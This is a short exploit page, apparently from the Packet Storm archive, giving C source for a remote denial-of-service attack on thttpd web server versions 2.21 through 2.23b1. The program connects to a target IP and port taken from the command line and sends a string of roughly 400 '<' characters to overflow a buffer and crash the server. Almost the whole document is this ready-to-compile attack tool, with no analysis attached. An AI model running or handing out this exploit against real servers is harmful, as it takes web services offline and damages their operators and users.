Thttpd v2.21 through 2.23b1 remote denial of service buffer overflow exploit.
dc4ab59e4569091147040021c6785d26637756f5863cd9d183215b3d2809884d/* THTTPd versions 2.21 through 2.23b1 DoS by phender */
/* This code will send a string to segfault the server */
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
main(int argc, char *argv[])
{
struct hostent *hent;
struct sockaddr_in sock;
int sockfd, port = 80, i = 0;
char buf[500];
if(argc < 2 || argc > 3){
printf("THTTPd (v2.21 - v2.23b1) DoS by phender\n");
printf("Usage: %s <target ip> [port]\n", argv[0]);
exit(1);
}
if(argc == 3)
port = atoi(argv[2]);
while(i < 400){
buf[i++] = '<';
}
buf[i] = 0;
strcat(buf, " hi\n\n");
bzero(&sock, sizeof(sock));
sock.sin_addr.s_addr = inet_addr(argv[1]);
sock.sin_port = htons(port);
sockfd = socket(AF_INET,SOCK_STREAM,0);
sock.sin_family = AF_INET;
if((connect(sockfd, (struct sockaddr *)&sock, sizeof(sock))) == -1){
perror("connect");
exit(1);
}
write(sockfd, buf, strlen(buf));
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed